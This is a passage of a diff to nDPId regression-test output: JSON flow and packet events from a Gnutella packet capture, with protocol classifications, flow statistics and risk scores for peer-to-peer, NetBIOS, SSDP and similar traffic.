+00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":63001,"flow_last_seen":63445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":65062,"flow_last_seen":65418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1142,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":69227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1089,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00622{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":12827,"flow_last_seen":41755,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":966,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} @@ -1358,42 +1348,49 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3112,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":3,"flow_last_seen":192908,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192908,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0jJQAAIARUAcKAAIPp3KqnHAJXSQAIHOsR05EED9HAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":192908,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192908,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0770AAIARtrQKAAIPpanijnAJGMoAIIHcR05EED9IAQFUC1FLUlAGUk5BXS\/iNQlw"} 00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":22405,"flow_idle_time":180000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1138,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74328,"flow_last_seen":88171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74329,"flow_last_seen":74396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1102,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":15284,"flow_last_seen":23969,"flow_idle_time":180000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1601,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":21843,"flow_idle_time":180000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":15285,"flow_last_seen":21297,"flow_idle_time":180000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":83805,"flow_last_seen":84251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1144,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72264,"flow_last_seen":72720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":954,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":63001,"flow_last_seen":78562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74327,"flow_last_seen":74692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1108,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1105,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00783{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":16487,"flow_last_seen":192636,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90746,"flow_last_seen":90799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":90746,"flow_last_seen":91392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3761,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":1717,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":91380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":90863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1090,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90747,"flow_last_seen":91396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3774,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90747,"flow_last_seen":90902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":670,"flow_tot_l4_payload_len":1773,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90739,"flow_last_seen":91076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 